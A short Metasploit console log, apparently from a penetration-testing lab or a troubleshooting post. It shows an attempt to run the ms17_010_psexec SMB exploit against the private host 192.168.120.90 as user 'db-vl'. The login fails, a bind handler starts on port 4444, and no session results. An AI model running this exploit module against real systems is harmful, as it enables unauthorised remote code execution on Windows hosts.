- sf5 exploit(windows/smb/ms17_010_psexec) > exploit
- [*] 192.168.120.90:445 - Authenticating to 192.168.120.90 as user 'db-vl'...
- [-] 192.168.120.90:445 - Rex::Proto::SMB::Exceptions::LoginError: Login Failed: The server responded with error: STATUS_ACCOUNT_RESTRICTION (Command=115 WordCount=0)
- [*] Started bind TCP handler against 192.168.120.90:4444
- [*] Exploit completed, but no session was created.